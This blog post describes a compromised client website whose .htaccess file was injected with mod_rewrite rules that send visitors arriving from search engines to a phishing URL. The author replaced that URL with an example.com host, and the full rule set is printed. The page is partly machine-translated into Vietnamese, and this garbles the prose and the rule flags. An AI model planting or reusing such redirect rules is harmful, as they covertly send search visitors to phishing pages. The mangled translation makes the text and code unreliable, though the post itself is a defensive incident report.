Thứ năm, January 22nd, 2009 | Tác giả:

I very recently found a problem with a client’s web site due to a .htaccess tập tin. The site was hosted on a Cửa sổ server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,HOẶC LÀ]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,HOẶC LÀ]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,HOẶC LÀ]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,HOẶC LÀ]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,HOẶC LÀ]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,HOẶC LÀ]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Tất nhiên, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working

Chia sẻ
Thể loại: lưu trữ, ngâu nhiên
Bạn có thể làm theo bất kỳ phản ứng với cụm từ này thông qua RSS 2.0 nuôi. Bạn có thể lại một phản ứng, hoặc trackback từ trang web của riêng bạn.
Để lại một trả lời » Đăng nhập